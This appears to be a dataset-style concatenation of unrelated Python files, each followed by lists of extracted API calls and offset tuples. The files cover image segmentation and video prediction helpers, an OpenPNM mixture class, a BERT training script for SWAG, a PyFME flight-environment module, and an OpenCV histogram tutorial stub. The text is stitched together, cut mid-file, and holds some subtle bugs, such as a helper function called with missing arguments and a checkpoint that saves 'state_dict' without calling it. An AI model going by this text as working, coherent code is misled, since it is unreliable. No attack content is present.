fig, ax = plt.subplots(1 , 3, figsize=(18, 8))
ax[0].imshow(img)
ax[1].imshow(mask)
ax[2].imshow(pred > thres_val)
else:
fig, ax = plt.subplots(1 , 2, figsize=(12, 8))
ax[0].imshow(img)
ax[1].imshow(mask)
plt.show()
def predict_img(img_path, thres_val, base_model=False):
img = plt.imread(img_path)
img = cv2.resize(img, (128, 128))
pred = base_model.predict(np.expand_dims(img, axis=0)).reshape((1, 128, 128, 1))
pred = np.squeeze(pred)
fig, ax = plt.subplots(1 , 2, figsize=(18, 8))
ax[0].imshow(img)
ax[1].imshow(pred > thres_val)
plt.show()
def video_predict(file_path, base_model, thresh_val):
'''
Read video and predict on each frame.
Args:
filename(str)
model(h5 file)
thresh_val(int): threshold value
'''
def getFrame(sec , img_mask_ds, video_path):
WIDTH, HEIGHT = 128, 128
vidcap = cv2.VideoCapture(file_path)
vidcap.set(cv2.CAP_PROP_POS_MSEC,sec*1000)
hasFrames,image = vidcap.read()
if hasFrames:
image_real = image
image = cv2.resize(image, (WIDTH, HEIGHT))
pred_img = base_model.predict(np.expand_dims(image, axis=0)).reshape((1, WIDTH, HEIGHT, 1))
pred_img = np.squeeze(pred_img)
img_mask_ds.append((image, (pred_img > thresh_val).astype(float)*255))
return hasFrames, img_mask_ds
img_mask_ds = list()
sec = 0
frameRate = 0.5 #//it will capture image in each 0.5 second
count = 1
success = getFrame(sec, img_mask_ds)
while success:
count = count + 1
sec = sec + frameRate
sec = round(sec, 2)
success, img_mask_ds = getFrame(sec, img_mask_ds)
return img_mask_ds | [
"matplotlib.pyplot.show",
"numpy.expand_dims",
"cv2.VideoCapture",
"numpy.squeeze",
"matplotlib.pyplot.imread",
"matplotlib.pyplot.subplots",
"cv2.resize"
] | [((644, 664), 'matplotlib.pyplot.imread', 'plt.imread', (['img_path'], {}), '(img_path)\n', (654, 664), True, 'import matplotlib.pyplot as plt\n'), ((675, 702), 'cv2.resize', 'cv2.resize', (['img', '(128, 128)'], {}), '(img, (128, 128))\n', (685, 702), False, 'import cv2\n'), ((799, 815), 'numpy.squeeze', 'np.squeeze', (['pred'], {}), '(pred)\n', (809, 815), True, 'import numpy as np\n'), ((830, 865), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(2)'], {'figsize': '(18, 8)'}), '(1, 2, figsize=(18, 8))\n', (842, 865), True, 'import matplotlib.pyplot as plt\n'), ((928, 938), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (936, 938), True, 'import matplotlib.pyplot as plt\n'), ((275, 291), 'numpy.squeeze', 'np.squeeze', (['pred'], {}), '(pred)\n', (285, 291), True, 'import numpy as np\n'), ((310, 345), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(3)'], {'figsize': '(18, 8)'}), '(1, 3, figsize=(18, 8))\n', (322, 345), True, 'import matplotlib.pyplot as plt\n'), ((467, 502), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(2)'], {'figsize': '(12, 8)'}), '(1, 2, figsize=(12, 8))\n', (479, 502), True, 'import matplotlib.pyplot as plt\n'), ((565, 575), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (573, 575), True, 'import matplotlib.pyplot as plt\n'), ((1249, 1276), 'cv2.VideoCapture', 'cv2.VideoCapture', (['file_path'], {}), '(file_path)\n', (1265, 1276), False, 'import cv2\n'), ((1441, 1475), 'cv2.resize', 'cv2.resize', (['image', '(WIDTH, HEIGHT)'], {}), '(image, (WIDTH, HEIGHT))\n', (1451, 1475), False, 'import cv2\n'), ((1603, 1623), 'numpy.squeeze', 'np.squeeze', (['pred_img'], {}), '(pred_img)\n', (1613, 1623), True, 'import numpy as np\n'), ((733, 760), 'numpy.expand_dims', 'np.expand_dims', (['img'], {'axis': '(0)'}), '(img, axis=0)\n', (747, 760), True, 'import numpy as np\n'), ((187, 214), 'numpy.expand_dims', 'np.expand_dims', (['img'], {'axis': '(0)'}), '(img, axis=0)\n', (201, 214), True, 'import numpy as np\n'), ((1518, 1547), 'numpy.expand_dims', 'np.expand_dims', (['image'], {'axis': '(0)'}), '(image, axis=0)\n', (1532, 1547), True, 'import numpy as np\n')] |
# from collections import ChainMap # Might use eventually
import numpy as np
from openpnm.phases import GenericPhase as GenericPhase
from openpnm.utils import logging, HealthDict, PrintableList
logger = logging.getLogger(__name__)
class GenericMixture(GenericPhase):
r"""
Creates Phase object that represents a multicomponent mixture system
consisting of a given list of OpenPNM Phase objects as components.
Parameters
----------
network : OpenPNM Network object
The network to which this phase object will be attached.
components : list of OpenPNM Phase objects
A list of all components that constitute this mixture
project : OpenPNM Project object, optional
The Project with which this phase should be associted. If a
``network`` is given then this is ignored and the Network's project
is used. If a ``network`` is not given then this is mandatory.
name : string, optional
The name of the phase. This is useful to keep track of the objects
throughout the simulation. The name must be unique to the project.
If no name is given, one is generated.
"""
def __init__(self, components=[], settings={}, **kwargs):
self.settings.update({'components': [],
})
super().__init__(settings={'prefix': 'mix'}, **kwargs)
self.settings.update(settings)
# Add any supplied phases to the phases list
for comp in components:
self.settings['components'].append(comp.name)
self['pore.mole_fraction.'+comp.name] = 0.0
self['pore.mole_fraction.all'] = np.zeros(self.Np, dtype=float)
logger.warning('Mixtures are a beta feature and functionality may ' +
'change in future versions')
def __getitem__(self, key):
try:
vals = super().__getitem__(key)
except KeyError:
try:
# If key ends in component name, fetch it
if key.split('.')[-1] in self.settings['components']:
comp = self.project[key.split('.')[-1]]
vals = comp[key.rsplit('.', maxsplit=1)[0]]
return vals
else:
raise KeyError
except KeyError:
vals = self.interleave_data(key)
return vals
def __setitem__(self, key, value):
# Prevent writing 'element.property.component' on mixture
invalid_keys = set(self.props(deep=True)).difference(set(self.props()))
if key in invalid_keys:
raise Exception(key + ' already assigned to a component object')
super().__setitem__(key, value)
def props(self, deep=False, **kwargs):
temp = PrintableList()
if deep:
for item in self.components.values():
temp.extend([prop+'.'+item.name for prop in item.props(**kwargs)])
temp.extend(super().props(**kwargs))
temp.sort()
return temp
def __str__(self):
horizontal_rule = '―' * 78
lines = super().__str__()
lines = '\n'.join((lines, 'Component Phases', horizontal_rule))
for item in self.components.values():
lines = '\n'.join((lines, item.__module__.replace('__', '') +
' : ' + item.name))
lines = '\n'.join((lines, horizontal_rule))
return lines
def _update_total_molfrac(self):
# Update mole_fraction.all
self['pore.mole_fraction.all'] = 0.0
dict_ = list(self['pore.mole_fraction'].values())
if len(dict_) > 1:
self['pore.mole_fraction.all'] = np.sum(dict_, axis=0)
self['throat.mole_fraction.all'] = 0.0
dict_ = list(self['throat.mole_fraction'].values())
if len(dict_) > 1:
self['throat.mole_fraction.all'] = np.sum(dict_, axis=0)
def update_concentrations(self, mole_fraction='pore.mole_fraction'):
r"""
Re-calculates the concentration of each species in the mixture based
on the current mole fractions.
This method looks up the mole fractions *and* the density of the
mixture, then finds the respective concentrations in $mol/m^{3}$.
Parameters
----------
"""
density = self['pore.molar_density']
for item in self.components.values():
mf = self['pore.mole_fraction.'+item.name]
self['pore.concentration.'+item.name] = density*mf
def update_mole_fractions(self, concentration='pore.concentration',
molar_density='pore.molar_density'):
r"""
Re-calculates mole fraction of each species in mixture based on the
current concentrations.
This method looks up the concentration of each species (using the
optionally specified concentration dictionary key), and calculates
the mole fraction. Optionally, it can use a molar density for the
mixture and N-1 concentrations to determine the Nth concentration and
all species mole fractions.
Parameters
----------
concentration : string, optional
The dictionary key pointing to the desired concentration values.
The default is 'pore.concentration'. Given this value, lookups
are performed for each species in the mixture.
molar_density : string, optional
The dictionary key pointing to the molar density of the mixture.
If not given (default), then 'pore.molar_density' is used. If
there are N-1 concentrations specified, then ``molar_density`` is
automatically used to find the Nth concentration.
Notes
-----
The method does not return any values. Instead it updates the mole
fraction arrays of each species directly.
"""
concentrations = [concentration + '.' + comp for comp
in self.settings['components']
if concentration + '.' + comp in self.keys()]
if len(concentrations) == len(self.components):
# Find total number of moles per unit volume
density = 0.0
for conc in concentrations:
density += self[conc]
# Normalize moles per unit volume for each species by the total
for conc in concentrations:
element, quantity, component = conc.split('.')
self[element+'.mole_fraction.'+component] = self[conc]/density
elif len(concentrations) == (len(self.components) - 1):
# Find mole fraction of N-1 species
mol_frac = 0.0
density = self[molar_density]
for conc in concentrations:
element, quantity, component = conc.split('.')
self[element+'.mole_fraction.'+component] = self[conc]/density
mol_frac += self[element+'.mole_fraction.'+component]
# Find mole fraction of Nth species using molar_density
given_comps = [conc.split('.')[2] for conc in concentrations]
all_comps = self.settings['components']
component = list(set(all_comps).difference(set(given_comps)))[0]
self[element+'.mole_fraction.'+component] = 1 - mol_frac
# [self[element+'.concentration.'+component] = (1 - mol_frac)*density
else:
raise Exception('Insufficient concentration values found ' +
'for component species, must specify ' +
str(abs(n_spec + 1)) + ' additional values')
def set_concentration(self, component, values=[]):
r"""
Specify mole fraction of each component in each pore
Parameters
----------
components : OpenPNM Phase object or name string
The phase whose mole fraction is being specified
values : array_like
The concentration of the given ``component `` in each pore. This
array must be *Np*-long, with one value for each pore in the
network. If a scalar is received it is applied to all pores.
See Also
--------
set_mole_fraction
"""
if type(component) == str:
component = self.components[component]
Pvals = np.array(values, ndmin=1)
if component not in self.project:
raise Exception(f"{component.name} doesn't belong to this project")
else:
if component.name not in self.settings['components']:
self.settings['components'].append(component.name)
if np.any(Pvals < 0.0):
logger.warning('Received values contain negative concentrations')
if Pvals.size:
self['pore.concentration.' + component.name] = Pvals
def set_mole_fraction(self, component, values=[]):
r"""
Specify mole fraction of each component in each pore
Parameters
----------
components : OpenPNM Phase object or name string
The phase whose mole fraction is being specified
values : array_like
The mole fraction of the given ``component `` in each pore. This
array must be *Np*-long, with one value between 0 and 1 for each
pore in the network. If a scalar is received it is applied to
all pores.
See Also
--------
set_concentration
"""
if type(component) == str:
component = self.components[component]
Pvals = np.array(values, ndmin=1)
if component not in self.project:
raise Exception(f"{component.name} doesn't belong to this project")
else:
if component.name not in self.settings['components']:
self.settings['components'].append(component.name)
if np.any(Pvals > 1.0) or np.any(Pvals < 0.0):
logger.warning('Received values contain mole fractions outside ' +
'the range of 0 to 1')
if Pvals.size:
self['pore.mole_fraction.' + component.name] = Pvals
self._update_total_molfrac()
def _get_comps(self):
comps = {item: self.project[item] for item in self.settings['components']}
return comps
def _set_comps(self, components):
if not isinstance(components, list):
components = [components]
self.settings['components'] = [val.name for val in components]
components = property(fget=_get_comps, fset=_set_comps)
def interleave_data(self, prop):
r"""
Gathers property values from component phases to build a single array
If the requested ``prop`` is not on this Mixture, then a search is
conducted on all associated components objects, and values from each
are assembled into a single array.
Parameters
----------
prop : string
The property to be retrieved
Returns
-------
array : ND-array
An array containing the specified property retrieved from each
component phase and assembled based on the specified mixing rule
"""
element = prop.split('.')[0]
if element == 'pore':
if np.any(self[element + '.mole_fraction.all'] != 1.0):
self._update_total_molfrac()
if np.any(self[element + '.mole_fraction.all'] != 1.0):
raise Exception('Mole fraction does not add to unity in all ' +
element + 's')
vals = np.zeros([self._count(element=element)], dtype=float)
try:
for comp in self.components.values():
vals += comp[prop]*self[element+'.mole_fraction.'+comp.name]
except KeyError:
vals = super().interleave_data(prop)
return vals
def check_mixture_health(self):
r"""
Checks the "health" of the mixture
Calculates the mole fraction of all species in each pore and returns
an list of where values are too low or too high
Returns
-------
health : dict
A HealtDict object containing lists of locations where the mole
fractions are not unity. One value indiates locations that are
too high, and another where they are too low.
"""
h = HealthDict()
h['mole_fraction_too_low'] = []
h['mole_fraction_too_high'] = []
self._update_total_molfrac()
lo = np.where(self['pore.mole_fraction.all'] < 1.0)[0]
hi = np.where(self['pore.mole_fraction.all'] > 1.0)[0]
if len(lo) > 0:
h['mole_fraction_too_low'] = lo
if len(hi) > 0:
h['mole_fraction_too_high'] = hi
return h
| [
"numpy.sum",
"numpy.zeros",
"numpy.any",
"numpy.where",
"numpy.array",
"openpnm.utils.logging.getLogger",
"openpnm.utils.PrintableList",
"openpnm.utils.HealthDict"
] | [((204, 231), 'openpnm.utils.logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (221, 231), False, 'from openpnm.utils import logging, HealthDict, PrintableList\n'), ((1655, 1685), 'numpy.zeros', 'np.zeros', (['self.Np'], {'dtype': 'float'}), '(self.Np, dtype=float)\n', (1663, 1685), True, 'import numpy as np\n'), ((2781, 2796), 'openpnm.utils.PrintableList', 'PrintableList', ([], {}), '()\n', (2794, 2796), False, 'from openpnm.utils import logging, HealthDict, PrintableList\n'), ((8384, 8409), 'numpy.array', 'np.array', (['values'], {'ndmin': '(1)'}), '(values, ndmin=1)\n', (8392, 8409), True, 'import numpy as np\n'), ((8690, 8709), 'numpy.any', 'np.any', (['(Pvals < 0.0)'], {}), '(Pvals < 0.0)\n', (8696, 8709), True, 'import numpy as np\n'), ((9622, 9647), 'numpy.array', 'np.array', (['values'], {'ndmin': '(1)'}), '(values, ndmin=1)\n', (9630, 9647), True, 'import numpy as np\n'), ((12468, 12480), 'openpnm.utils.HealthDict', 'HealthDict', ([], {}), '()\n', (12478, 12480), False, 'from openpnm.utils import logging, HealthDict, PrintableList\n'), ((3689, 3710), 'numpy.sum', 'np.sum', (['dict_'], {'axis': '(0)'}), '(dict_, axis=0)\n', (3695, 3710), True, 'import numpy as np\n'), ((3892, 3913), 'numpy.sum', 'np.sum', (['dict_'], {'axis': '(0)'}), '(dict_, axis=0)\n', (3898, 3913), True, 'import numpy as np\n'), ((9928, 9947), 'numpy.any', 'np.any', (['(Pvals > 1.0)'], {}), '(Pvals > 1.0)\n', (9934, 9947), True, 'import numpy as np\n'), ((9951, 9970), 'numpy.any', 'np.any', (['(Pvals < 0.0)'], {}), '(Pvals < 0.0)\n', (9957, 9970), True, 'import numpy as np\n'), ((11343, 11394), 'numpy.any', 'np.any', (["(self[element + '.mole_fraction.all'] != 1.0)"], {}), "(self[element + '.mole_fraction.all'] != 1.0)\n", (11349, 11394), True, 'import numpy as np\n'), ((12612, 12658), 'numpy.where', 'np.where', (["(self['pore.mole_fraction.all'] < 1.0)"], {}), "(self['pore.mole_fraction.all'] < 1.0)\n", (12620, 12658), True, 'import numpy as np\n'), ((12675, 12721), 'numpy.where', 'np.where', (["(self['pore.mole_fraction.all'] > 1.0)"], {}), "(self['pore.mole_fraction.all'] > 1.0)\n", (12683, 12721), True, 'import numpy as np\n'), ((11460, 11511), 'numpy.any', 'np.any', (["(self[element + '.mole_fraction.all'] != 1.0)"], {}), "(self[element + '.mole_fraction.all'] != 1.0)\n", (11466, 11511), True, 'import numpy as np\n')] |
import os
import numpy as np
import torch
from datasets import get_swag_data
from transformers import BertTokenizer, AdamW, get_linear_schedule_with_warmup
from modeling_bert import BertForMultipleChoice
import utils
from tqdm import tqdm
from torch.utils.tensorboard import SummaryWriter
from evaluation import evaluate_accuracy
import json
# os.environ["CUDA_VISIBLE_DEVICES"] = "1"
if __name__ == "__main__":
# Initialize
args = utils.parse_arguments()
checkpoint_dir = os.path.join(args.checkpoint_dir, args.model_name)
result_dir = os.path.join(args.result_dir, args.model_name)
log_dir = os.path.join(args.logdir, args.model_name)
utils.create_chkp_result_dirs(checkpoint_dir, result_dir, log_dir, args)
writer = SummaryWriter(log_dir=log_dir)
utils.set_random_seed(args.seed)
wandb = utils.initialize_wandb(args)
# Multi-GPU
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu_ids
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
args.n_gpu = torch.cuda.device_count()
args.batch_size = args.batch_size * args.n_gpu
print("device:", device, "n_gpu:", args.n_gpu, "Batch:size", args.batch_size)
args.val_freq = int(args.val_freq / args.n_gpu)
# Model
knowledge_tuples = {}
kwargs = {"knowledge_method": args.knowledge_method}
if args.knowledge_method == 1:
kwargs["cluster_path"] = "./data/transE_clusters.pkl"
model = BertForMultipleChoice.from_pretrained("bert-base-uncased", **kwargs)
text_encoder = BertTokenizer.from_pretrained("bert-base-uncased")
print("Loaded Model from pretrained")
model.to(device)
if args.n_gpu > 1:
model = torch.nn.DataParallel(model)
# for param in model.named_parameters():
# if "classifier" not in param[0]:
# param[1].requires_grad = False
# Data and dataloaders
dataset_train, dataset_val = get_swag_data(
args.data_dir, text_encoder, args.num_validation_samples
)
train_loader = torch.utils.data.DataLoader(
dataset_train,
batch_size=args.batch_size,
pin_memory=True,
num_workers=4,
shuffle=True,
)
val_loader = torch.utils.data.DataLoader(
dataset_val,
batch_size=args.batch_size,
pin_memory=True,
num_workers=4,
shuffle=False,
)
# Optimizer
# TODO: Should we use warmup etc. Shift to transformer optimizer that can handle all this
# To keep effective batch-size 32 as per hugging_face examples
args.gradient_accumulation_steps = int(16 / args.batch_size)
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = [
{
"params": [
p
for n, p in model.named_parameters()
if not any(nd in n for nd in no_decay)
],
"weight_decay": args.weight_decay,
},
{
"params": [
p
for n, p in model.named_parameters()
if any(nd in n for nd in no_decay)
],
"weight_decay": 0.0,
},
]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.lr, eps=args.adam_epsilon)
t_total = len(train_loader) // args.gradient_accumulation_steps * args.num_epochs
scheduler = get_linear_schedule_with_warmup(
optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=t_total
)
criterion = torch.nn.CrossEntropyLoss(reduction="mean")
model.train()
# Training
iternum = 0
best_perf = -1
best_iter = 0
for epoch in range(args.num_epochs):
for data, label, attention_masks in tqdm(train_loader, desc="Train_Epoch"):
data = data.to(device)
label = label.to(device)
attention_masks = attention_masks.to(device)
output = model(input_ids=data, attention_mask=attention_masks)
logits = output[0]
loss = criterion(logits, label)
if args.gradient_accumulation_steps > 1:
loss = loss / args.gradient_accumulation_steps
loss.backward()
if iternum % args.gradient_accumulation_steps == 0:
optimizer.step()
scheduler.step() # Update learning rate schedule
# scheduler.step() # Update learning rate schedule
optimizer.zero_grad()
# optimizer.zero_grad()
# optimizer.step()
writer.add_scalar("loss", loss.item(), iternum)
writer.add_scalar("lr", scheduler.get_lr()[0], iternum)
if np.mod(iternum, args.val_freq) == 0 and iternum > 0:
acc, scores_test, labels_test = evaluate_accuracy(
model, val_loader, device
)
tqdm.write(f"Accuracy at {iternum} is {acc:.2f}")
writer.add_scalar("acc", acc, iternum)
model.train()
result_filename = os.path.join(result_dir, f"{iternum}.npy")
np.save(result_filename, acc)
if wandb is not None:
wandb.run.summary["best_accuracy"] = best_perf
wandb.run.summary["best_iter"] = best_iter
# Save For Debug Info
"""
f = open(result_filename.replace("npy", "json"), "w")
prediction = scores_test.argmax(-1)
sep_token_id = text_encoder.sep_token_id
for ii in range(100):
tmp_data = {}
data_tx, label, _ = dataset_val[ii]
data_tx = data_tx.numpy()
position_sep_token = (
(data_tx[0] == sep_token_id).nonzero()[0].tolist()
)
tmp_data["context"] = text_encoder.decode(
data_tx[0, : position_sep_token[0]]
)
tmp_data["question"] = text_encoder.decode(
data_tx[0, position_sep_token[0] + 1 : position_sep_token[1]]
)
answers = []
f or jj in range(4):
position_sep_token = (
(data_tx[jj] == sep_token_id).nonzero()[0].tolist()
)
answers.append(
text_encoder.decode(
data_tx[jj][
position_sep_token[1] + 1 : position_sep_token[2]
]
)
)
tmp_data["answers"] = answers
tmp_data["gnd_label"] = [label.item()]
tmp_data["pred_label"] = [prediction[ii].item()]
json.dump(tmp_data, f, indent=True)
f.close()
"""
if acc > best_perf:
best_perf = acc
best_iter = iternum
if args.save:
checkpoint = {
"state_dict": model.state_dict,
"args": args,
"best_iter": best_iter,
"best_perf": best_perf,
}
torch.save(checkpoint, os.path.join(checkpoint_dir, "best.pt"))
iternum += 1
print("Finish Epoch")
| [
"torch.cuda.device_count",
"os.path.join",
"torch.utils.data.DataLoader",
"utils.set_random_seed",
"torch.utils.tensorboard.SummaryWriter",
"utils.initialize_wandb",
"tqdm.tqdm",
"numpy.save",
"datasets.get_swag_data",
"numpy.mod",
"evaluation.evaluate_accuracy",
"transformers.BertTokenizer.fr... | [((443, 466), 'utils.parse_arguments', 'utils.parse_arguments', ([], {}), '()\n', (464, 466), False, 'import utils\n'), ((488, 538), 'os.path.join', 'os.path.join', (['args.checkpoint_dir', 'args.model_name'], {}), '(args.checkpoint_dir, args.model_name)\n', (500, 538), False, 'import os\n'), ((556, 602), 'os.path.join', 'os.path.join', (['args.result_dir', 'args.model_name'], {}), '(args.result_dir, args.model_name)\n', (568, 602), False, 'import os\n'), ((617, 659), 'os.path.join', 'os.path.join', (['args.logdir', 'args.model_name'], {}), '(args.logdir, args.model_name)\n', (629, 659), False, 'import os\n'), ((664, 736), 'utils.create_chkp_result_dirs', 'utils.create_chkp_result_dirs', (['checkpoint_dir', 'result_dir', 'log_dir', 'args'], {}), '(checkpoint_dir, result_dir, log_dir, args)\n', (693, 736), False, 'import utils\n'), ((750, 780), 'torch.utils.tensorboard.SummaryWriter', 'SummaryWriter', ([], {'log_dir': 'log_dir'}), '(log_dir=log_dir)\n', (763, 780), False, 'from torch.utils.tensorboard import SummaryWriter\n'), ((785, 817), 'utils.set_random_seed', 'utils.set_random_seed', (['args.seed'], {}), '(args.seed)\n', (806, 817), False, 'import utils\n'), ((830, 858), 'utils.initialize_wandb', 'utils.initialize_wandb', (['args'], {}), '(args)\n', (852, 858), False, 'import utils\n'), ((1021, 1046), 'torch.cuda.device_count', 'torch.cuda.device_count', ([], {}), '()\n', (1044, 1046), False, 'import torch\n'), ((1439, 1507), 'modeling_bert.BertForMultipleChoice.from_pretrained', 'BertForMultipleChoice.from_pretrained', (['"""bert-base-uncased"""'], {}), "('bert-base-uncased', **kwargs)\n", (1476, 1507), False, 'from modeling_bert import BertForMultipleChoice\n'), ((1527, 1577), 'transformers.BertTokenizer.from_pretrained', 'BertTokenizer.from_pretrained', (['"""bert-base-uncased"""'], {}), "('bert-base-uncased')\n", (1556, 1577), False, 'from transformers import BertTokenizer, AdamW, get_linear_schedule_with_warmup\n'), ((1903, 1974), 'datasets.get_swag_data', 'get_swag_data', (['args.data_dir', 'text_encoder', 'args.num_validation_samples'], {}), '(args.data_dir, text_encoder, args.num_validation_samples)\n', (1916, 1974), False, 'from datasets import get_swag_data\n'), ((2008, 2128), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['dataset_train'], {'batch_size': 'args.batch_size', 'pin_memory': '(True)', 'num_workers': '(4)', 'shuffle': '(True)'}), '(dataset_train, batch_size=args.batch_size,\n pin_memory=True, num_workers=4, shuffle=True)\n', (2035, 2128), False, 'import torch\n'), ((2189, 2308), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['dataset_val'], {'batch_size': 'args.batch_size', 'pin_memory': '(True)', 'num_workers': '(4)', 'shuffle': '(False)'}), '(dataset_val, batch_size=args.batch_size,\n pin_memory=True, num_workers=4, shuffle=False)\n', (2216, 2308), False, 'import torch\n'), ((3146, 3216), 'transformers.AdamW', 'AdamW', (['optimizer_grouped_parameters'], {'lr': 'args.lr', 'eps': 'args.adam_epsilon'}), '(optimizer_grouped_parameters, lr=args.lr, eps=args.adam_epsilon)\n', (3151, 3216), False, 'from transformers import BertTokenizer, AdamW, get_linear_schedule_with_warmup\n'), ((3319, 3430), 'transformers.get_linear_schedule_with_warmup', 'get_linear_schedule_with_warmup', (['optimizer'], {'num_warmup_steps': 'args.warmup_steps', 'num_training_steps': 't_total'}), '(optimizer, num_warmup_steps=args.\n warmup_steps, num_training_steps=t_total)\n', (3350, 3430), False, 'from transformers import BertTokenizer, AdamW, get_linear_schedule_with_warmup\n'), ((3456, 3499), 'torch.nn.CrossEntropyLoss', 'torch.nn.CrossEntropyLoss', ([], {'reduction': '"""mean"""'}), "(reduction='mean')\n", (3481, 3499), False, 'import torch\n'), ((1680, 1708), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model'], {}), '(model)\n', (1701, 1708), False, 'import torch\n'), ((3672, 3710), 'tqdm.tqdm', 'tqdm', (['train_loader'], {'desc': '"""Train_Epoch"""'}), "(train_loader, desc='Train_Epoch')\n", (3676, 3710), False, 'from tqdm import tqdm\n'), ((966, 991), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (989, 991), False, 'import torch\n'), ((4723, 4767), 'evaluation.evaluate_accuracy', 'evaluate_accuracy', (['model', 'val_loader', 'device'], {}), '(model, val_loader, device)\n', (4740, 4767), False, 'from evaluation import evaluate_accuracy\n'), ((4822, 4871), 'tqdm.tqdm.write', 'tqdm.write', (['f"""Accuracy at {iternum} is {acc:.2f}"""'], {}), "(f'Accuracy at {iternum} is {acc:.2f}')\n", (4832, 4871), False, 'from tqdm import tqdm\n'), ((4991, 5033), 'os.path.join', 'os.path.join', (['result_dir', 'f"""{iternum}.npy"""'], {}), "(result_dir, f'{iternum}.npy')\n", (5003, 5033), False, 'import os\n'), ((5050, 5079), 'numpy.save', 'np.save', (['result_filename', 'acc'], {}), '(result_filename, acc)\n', (5057, 5079), True, 'import numpy as np\n'), ((4622, 4652), 'numpy.mod', 'np.mod', (['iternum', 'args.val_freq'], {}), '(iternum, args.val_freq)\n', (4628, 4652), True, 'import numpy as np\n'), ((7400, 7439), 'os.path.join', 'os.path.join', (['checkpoint_dir', '"""best.pt"""'], {}), "(checkpoint_dir, 'best.pt')\n", (7412, 7439), False, 'import os\n')] |
"""
Python Flight Mechanics Engine (PyFME).
Copyright (c) AeroPython Development Team.
Distributed under the terms of the MIT License.
"""
from pyfme.utils.anemometry import tas2eas, tas2cas, calculate_alpha_beta_TAS
from collections import namedtuple
# Conditions class
Conditions = namedtuple('conditions', ['TAS','CAS','Mach','q_inf',
'rho','T','P','a','alpha',
'beta','gravity_vector'])
from pyfme.environment.atmosphere import SeaLevel
from pyfme.environment.wind import NoWind
from pyfme.environment.gravity import VerticalConstant
import numpy as np
class Environment(object):
"""
Stores all the environment info: atmosphere, gravity and wind.
"""
def __init__(self, atmosphere=None, gravity=None, wind=None):
"""
Parameters
----------
atmosphere : Atmosphere
Atmospheric model.
gravity : Gravity
Gravity model.
wind : Wind
Wind or gust model.
"""
self.atmosphere = atmosphere if atmosphere else SeaLevel()
self.gravity = gravity if gravity else VerticalConstant()
self.wind = wind if wind else NoWind()
def gravity_magnitude(self, state):
return self.gravity.magnitude(state)
def gravity_vector(self, state):
return self.gravity.vector(state)
def horizon_wind(self, state):
return self.wind.horizon(state)
def body_wind(self, state):
return self.wind.body(state)
def calculate_aero_conditions(self, state):
# Getting conditions from environment
body_wind = self.body_wind(state)
T, P, rho, a = self.atmosphere.variables(state)
# Velocity relative to air: aerodynamic velocity.
aero_vel = (state.velocity - body_wind)
alpha, beta, TAS = calculate_alpha_beta_TAS(aero_vel)
# Setting velocities & dynamic pressure
CAS = tas2cas(TAS, P, rho)
EAS = tas2eas(TAS, rho)
Mach = TAS / a
q_inf = 0.5 * rho * np.square(TAS)
# gravity vector
gravity_vector = self.gravity_vector(state)
return Conditions(TAS, CAS, Mach, q_inf, rho, T, P, a, alpha, beta, gravity_vector)
| [
"pyfme.utils.anemometry.calculate_alpha_beta_TAS",
"pyfme.utils.anemometry.tas2eas",
"pyfme.utils.anemometry.tas2cas",
"pyfme.environment.wind.NoWind",
"pyfme.environment.gravity.VerticalConstant",
"numpy.square",
"pyfme.environment.atmosphere.SeaLevel",
"collections.namedtuple"
] | [((292, 410), 'collections.namedtuple', 'namedtuple', (['"""conditions"""', "['TAS', 'CAS', 'Mach', 'q_inf', 'rho', 'T', 'P', 'a', 'alpha', 'beta',\n 'gravity_vector']"], {}), "('conditions', ['TAS', 'CAS', 'Mach', 'q_inf', 'rho', 'T', 'P',\n 'a', 'alpha', 'beta', 'gravity_vector'])\n", (302, 410), False, 'from collections import namedtuple\n'), ((1921, 1955), 'pyfme.utils.anemometry.calculate_alpha_beta_TAS', 'calculate_alpha_beta_TAS', (['aero_vel'], {}), '(aero_vel)\n', (1945, 1955), False, 'from pyfme.utils.anemometry import tas2eas, tas2cas, calculate_alpha_beta_TAS\n'), ((2022, 2042), 'pyfme.utils.anemometry.tas2cas', 'tas2cas', (['TAS', 'P', 'rho'], {}), '(TAS, P, rho)\n', (2029, 2042), False, 'from pyfme.utils.anemometry import tas2eas, tas2cas, calculate_alpha_beta_TAS\n'), ((2058, 2075), 'pyfme.utils.anemometry.tas2eas', 'tas2eas', (['TAS', 'rho'], {}), '(TAS, rho)\n', (2065, 2075), False, 'from pyfme.utils.anemometry import tas2eas, tas2cas, calculate_alpha_beta_TAS\n'), ((1133, 1143), 'pyfme.environment.atmosphere.SeaLevel', 'SeaLevel', ([], {}), '()\n', (1141, 1143), False, 'from pyfme.environment.atmosphere import SeaLevel\n'), ((1192, 1210), 'pyfme.environment.gravity.VerticalConstant', 'VerticalConstant', ([], {}), '()\n', (1208, 1210), False, 'from pyfme.environment.gravity import VerticalConstant\n'), ((1250, 1258), 'pyfme.environment.wind.NoWind', 'NoWind', ([], {}), '()\n', (1256, 1258), False, 'from pyfme.environment.wind import NoWind\n'), ((2129, 2143), 'numpy.square', 'np.square', (['TAS'], {}), '(TAS)\n', (2138, 2143), True, 'import numpy as np\n')] |
#Histograms -->allow to visualize distribution of pixel intensity of an image (grayscale or RGB)
import cv2 as cv
import matplotlib.pyplot as plt
import numpy as np
# img = cv.imread("Photos/cats 2.jpg")
# # cv.imshow("Original Image",img)
img = cv.imread('Photos/cats.jpg')
# cv.imshow("Original Image",img)
# gray = cv.cvtColor(img,cv.COLOR_BGR2GRAY) #Gray scaled image
blank = np.zeros(img.shape[:2],dtype=np.uint8) #blank screen of size of the image
# circle = cv.circle(blank,(img.shape[1]//2,img.shape[0]//2),100,255,-1) #circle of radius 100 in the center of the blank screen
# mask = cv.bitwise_and(gray,gray,mask=circle) #intersect(mask) the gray image with the circle
# cv.imshow("Masked image",mask)
#grayscale histogram
